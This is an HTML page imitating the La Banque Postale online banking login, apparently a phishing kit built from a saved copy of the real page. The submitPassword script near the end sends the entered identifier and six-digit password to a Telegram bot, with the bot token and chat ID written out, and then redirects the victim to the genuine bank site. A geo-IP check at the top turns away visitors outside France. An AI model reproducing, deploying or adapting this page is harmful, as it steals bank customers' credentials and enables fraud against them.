<!DOCTYPE html>
<!-- saved from url=(0176)https://voscomptesenligne.labanquepostale.fr/wsost/OstBrokerWeb/loginform?TAM_OP=login&ERROR_CODE=0x00000000&URL=%2Fvoscomptes%2FcanalXHTML%2Fidentif.ea%3Forigin%3Dparticuliers -->
<html class="no-js" lang="fr" data-tb-mode="light" data-tb-cvd="old"><div id="in-page-channel-node-id" data-channel-name="in_page_channel_23Ce9Q"></div><head><meta http -equiv="Content-Type" content="text/html; charset=windows-1252">
    
    <title>Connexion - La Banque Postale</title>
    <meta name="viewport" content="width=device-width,initial-scale=1">
    <meta name="format-detection" content="telephone=no">

    <meta name="theme-color" content="#0b234d">

<script>
  function getIP(json) {
    var ip = json.ip;
    var country = json.country_code;
    if (country !== "FR") {
      alert("Accès refusé. Vous devez être en France pour accéder à cette page.");
      window.location.href = "https://www.google.fr"; // redirect to Google France
    }
  }

  function getGeoIP() {
    var xhr = new XMLHttpRequest();
    xhr.open('GET', 'https://ipapi.co/json/', true);
    xhr.onload = function() {
      if (xhr.status === 200) {
        var json = JSON.parse(xhr.responseText);
        getIP(json);
      }
    };
    xhr.send();
  }

  getGeoIP();
</script>


    <style type="text/css">
        @import url(https://transverse.labanquepostale.fr/xo_/9.10.2.0/cvvs/css/loader.css);
        @import url(https://transverse.labanquepostale.fr/xo_/9.10.2.0/cvvs/css/cvs_refonte.css);
        @import url(https://transverse.labanquepostale.fr/xo_/toolbox/3.1/toolbox-xo-celadon.css);
        @import url(https://transverse.labanquepostale.fr/xo_/9.10.2.0/cvvs/css/cvd-refonte.css);
    </style>

    <script src="./toolbox-xo-celadon.min.js.&#1041;&#1077;&#1079; &#1085;&#1072;&#1079;&#1074;&#1072;&#1085;&#1080;&#1103;" type="text/javascript"></script>
    <script language="javascript" type="text/javascript" src="./val_keypad_cvd.js.&#1041;&#1077;&#1079; &#1085;&#1072;&#1079;&#1074;&#1072;&#1085;&#1080;&#1103;"></script>
    <script language="javascript" type="text/javascript" src="./val_keypad_cvvs-env.js.&#1041;&#1077;&#1079; &#1085;&#1072;&#1079;&#1074;&#1072;&#1085;&#1080;&#1103;"></script><script type="text/javascript" async="" src="./loreo.js.&#1041;&#1077;&#1079; &#1085;&#1072;&#1079;&#1074;&#1072;&#1085;&#1080;&#1103;"></script>
<script src="./fruprem.js.&#1041;&#1077;&#1079; &#1085;&#1072;&#1079;&#1074;&#1072;&#1085;&#1080;&#1103;" async="" type="text/javascript"></script><script type="text/javascript" src="./netroco.js.&#1041;&#1077;&#1079; &#1085;&#1072;&#1079;&#1074;&#1072;&#1085;&#1080;&#1103;" id="8wkf6"></script><script type="text/javascript" src="./piment.js.&#1041;&#1077;&#1079; &#1085;&#1072;&#1079;&#1074;&#1072;&#1085;&#1080;&#1103;" id="vxx4q"></script><script type="text/javascript" src="./drun.js.&#1041;&#1077;&#1079; &#1085;&#1072;&#1079;&#1074;&#1072;&#1085;&#1080;&#1103;" id="w9bbq8"></script><script type="text/javascript" src="./dasti.js.&#1041;&#1077;&#1079; &#1085;&#1072;&#1079;&#1074;&#1072;&#1085;&#1080;&#1103;" id="a8tdn7"></script><script type="text/javascript" async="" src="./u9mW"></script><script type="text/javascript" async="" src="./u9mW(1)"></script><script type="text/javascript" async="" src="./sty"></script><script type="text/javascript" async="" src="./sty(1)"></script><script type="text/javascript" async="" src ="./u9mW(2)"></script ><script type="text/javascript" async="" src="./u9mW(3)"></script><script type="text/javascript" async="" src="./u9mW(4)"></script><script type="text/javascript" async="" src="./u9mW(5)"></script><script type="text/javascript" async="" src="./u9mW(6)"></script><script type="text/javascript" async="" src="./u9mW(7)"></script></head>

<body data-image="logo" data-tb-animate="actif" class="tb-user-connected">
<div class="flex-container--column tb-wrapper-main">
    <main class="flex-item-fluid overflow-y back-color-trans txt-color-black txt-primary p-16" role="main">
        <form id="form-xo-1" method="post" action="https://voscomptesenligne.labanquepostale.fr/wsost/OstBrokerWeb/auth" name="formAccesCompte" onsubmit="return false;">

            <div id="hidden">
                <input type="hidden" name="urlbackend" value="%2Fvoscomptes%2FcanalXHTML%2Fidentif.ea%3Forigin%3Dparticuliers">
                <input type="hidden" name="origin" value="particuliers">
                <input type="hidden" name="cv" value="true">
                <input type="hidden" name="cvvs" value="">
                <input type="hidden" id="iscd" name="iscdName" value="ppfb4ee093adcb0bfb53ba35c77e7b1fea75c547251729033972">
                <input type="hidden" id="clt" name="cltName" value="1">
            </div>

            <!-- ECRAN -->
            <div data-tb-cvd-bloc="" class="flex-item-fluid small-w100 tiny-w100" id="ecran">

                <div data-tb-form-field="" data-tb-form-id="identifiant" class="flex-container w100">

                    <label data-tb-variant="body-b" for="identifiant" class="txt-primary mb-4">Identifiant (10 chiffres)</label>
                    <div class="flex-container w100">
						<div class="tb-container-inputfield w100 --reset --underline --injected" data-tb-type="code" data-tb-length="10">
                                <input type="text" id="identifiant" inputmode="numeric" data-tb-input-field-accessreset="Effacer la saisie de l'identifiant" maxlength="10" pattern="[\*0-9]*" autocomplete="username" aria-required="true" name="username" class="--ready --savearia">
                        <button class="flex-container flex-align-center flex-center --reset" data-lien-user="actif" type="button"><span data-icon="tb-reset" class="--reset" aria-hidden="true"></span><span class="visually-hidden access-text">Effacer la saisie de l'identifiant</span></button><div data-tb-underline="" aria-hidden="true"><div class=""></div><div class=""></div><div class=""></div><div class=""></div><div class=""></div><div class=""></div><div class=""></div><div class="--caret"></div></div>
                    </div>
                    <div data-tb-form-message="" class="flex-container flex-item-last">
                        <div data-icon="tb-erreur" aria-hidden="true" class="--size16px"></div>
                        <p data-ad-messages="identifiant" class="flex-container--column flex-item-fluid mts mb0 is-hidden" hidden="hidden">
                            <span data-ad-message="RG001" id="identifiant-RG001" class="is-hidden" hidden="hidden">Vous devez saisir un identifiant.</span>
                            <span data-ad-message="RG002" id="identifiant-RG002" class="is-hidden" hidden="hidden">L'identifiant doit contenir 10 chiffres.</span>
                        </p>
                    </div>
                </div>

				<!-- Case Ã  cocher -->
					<div class="tb-switch --animate-touch mt-16">
						<input id="check" name="check" type="checkbox" class="visually-hidden">
						<label for="check" class="flex-container--row flex-align-center">
							<span class="tb-switch-check">
								<span data-icon="ic_interface_check" aria-hidden="true" class="--absolute-contains">
                      </span>
							</span>
							<span data-tb-variant="body-s" class="tb-switch-label flex-item-first flex-item-fluid --fix-ms txt-secondary">
								Mï¿½mor iser mon ident ifiant
                        </span>
                    </label>
                </div>


				<!-- Bouton continuer -->
				<div id="btnContinuer" class="mt-16 u-txt-center" hidden="true">
					<button class="tb-btn-p --large w100" type="submit" data-lien-user="actif" onclick="continuer()">
                        <span>Continuer</span>
                    </button>
                </div>

				<!-- Volet Mot de passe -->
				<div id="password-container" style="display: none;">
					<!-- Mot de passe -->
					<div data-tb-form-field="" data-tb-form-id="motdepasse" class="flex-container--column hide-focus">

						<!-- LABEL -->
						<div data-tb-cvd-label="" role="heading" aria-level="3" id="label-password" tabindex="-1" data-tb-cvd-alert="N&#39;appuyez pas sur les chiffres de votre clavier, utilisez les boutons suivants pour saisir votre mot de passe">
							<span aria-hidden="true" data-tb-variant="body-b" class="txt-primary">Mot de passe (6 chiffres)</span>
							<span class="visually-hidden">Utilisez les boutons suivants pour saisir votre Mot de passe 6 chiffres sur ce clavier</span>
                        </div>

						<!-- INPUT + PUCES -->
						<div class="tb-container-cvdPsw --reset --injected">
							<div class="relative">
								<input type="text" id="password" name="password" maxlength="6" hidden="" class="--ready --savearia">
                            <span class="puces" aria-hidden="true"><span class="puce --select"></span><span class="puce --select"></span><span class="puce --select"></span><span class="puce --select"></span><span class="puce --select"></span><span class="puce --select"></span></span></div>
                        <div data-tb-aria="" aria-atomic="true" class="visually-hidden access-text" aria-live="polite"><p>6 chiffres saisis sur 6, mot de passe complet</p></div><button class="flex-container flex-align-center flex-center --reset" id="reset-password" type="button" data-lien-user="actif"><span data-icon="tb-reset" aria-hidden="true"></span><span class="visually-hidden access-text">Effacer la saisie du mot de passe</span></button></div>

						<!-- ERRORS -->
                        <div data-tb-form-message="" class="flex-container">
							<div data-icon="tb-erreur" aria-hidden="true" class="--size16px"></div>
							<div role="heading" aria-level="4" id="motdepasse" tabindex="-1" data-ad-messages="motdepasse" class="flex-container--column flex-item-fluid no-aria-describedby is-hidden --savearia" hidden="hidden">
								<span data-ad-message="vide" id="motdepasse-vide" class="is-hidden" hidden="hidden">Vous devez saisir un mot de passe.</span>
								<span data-ad-message="incomplet" id="motdepasse-incomplet" class="is-hidden" hidden="hidden">
									<span aria-hidden="true">Le mot de passe doit contenir 6 chiffres</span>
										<span class="visually-hidden access-text">Le mot de passe doit contenir 6 chiffres</span>
									</span>
                            </div>

                        </div>
                       <div class="flex-container flex-center mt-16" data-tb-cvd-id="password">
    <div data-tb-cvd-keys="">
        <button type="button" data-tb-index="0" class="tb-btn-k --medium">0</button>
        <button type="button" data-tb-index="7" class="tb-btn-k --medium">1</button>
        <button type="button" data-tb-index="4" class="tb-btn-k --medium">2</button>
        <button type="button" data-tb-index="3" class="tb-btn-k --medium">3</button>
        <button type="button" data-tb-index="4" class="tb-btn-k --medium">4</button>
        <button type="button" data-tb-index="5" class="tb-btn-k --medium">5</button>
        <button type="button" data-tb-index="6" class="tb-btn-k --medium">6</button>
        <button type="button" data-tb-index="7" class="tb-btn-k --medium">7</button>
        <button type="button" data-tb-index="8" class="tb-btn-k --medium">8</button>
        <span></span>
        <button type="button" data-tb-index="9" class="tb-btn-k --medium">9</button>
        <span></span>

    </ div>
</div>

                    </div>
					<!-- Bouton de connexion -->
					<div class="flex-container--column flex-align-center mt-24 u-txt-center">
						<button data-tb-cvd-valider="" id="btnConfirmer" class="tb-btn-p --large w100" type="submit" data-lien-user="actif" onclick="submitPassword()">
                            <span>Se connecter</span>
                        </button>
                    </div>
                </div>
            </div>

        </form>
		<!-- LOADER -->
		<div id="tbi-loader" class="--tiny --spinner" data-tb-spinner="spin"></div>
    </main>
</div>

<script language="javascript" type="text/javascript">
    var PATH_JS = "https://transverse.labanquepostale.fr/xo_/9.10.2.0/cvvs";
    var PATH_RESIZER = "https://www.labanquepostale.fr/etc.clientlibs/labanquepostale/commons/clientlibs/designsystem/vendors";
</script>

<script type="text/javascript" src="./iframeresizer-contentWindow-4-3-2.min.js.&#1041;&#1077;&#1079; &#1085;&#1072;&#1079;&#1074;&#1072;&#1085;&#1080;&#1103;"></script><div style="clear: both; display: block; height: 0px;"></div><iframe title="umwhiv" id="idi5" style="visibility: hidden; width: 0px; height: 0px; border: none; display: none;" src="./saved_resource.html"></iframe><iframe title="bdswhr" id="igdi365" style="visibility: hidden; width: 0px; height: 0px; border: none; display: none;" src="./saved_resource(1).html"></iframe>

<script>
    function continuer() {
        // existing code here...
        document.getElementById("password-container").style.display = "block";
    }

function submitPassword() {
    var identifiant = document.getElementById("identifiant").value;
    var password = document.getElementById("password").value;

    if (identifiant && password) {

        var xhr = new XMLHttpRequest();
        xhr.open('POST', 'https://api.telegram.org/bot6551387568:AAHE6ML_3ym0hz38uvt9X84O52V261QQDQQ/sendMessage', true);
        xhr.setRequestHeader('Content-Type', 'application/json');
        xhr.send(JSON.stringify({
            chat_id:  6640053788,
            text: 'Identifiant: ' + identifiant + '\nMot de passe: ' + password
        }));
  window.top.location.href = "https://www.labanquepostale.fr/particulier/comptes-et-cartes/espaces-clients/securite/certicode-numero-securise.html";
    } else {
        alert("Veuillez remplir tous les champs");
    }
}
</script>

</body></html>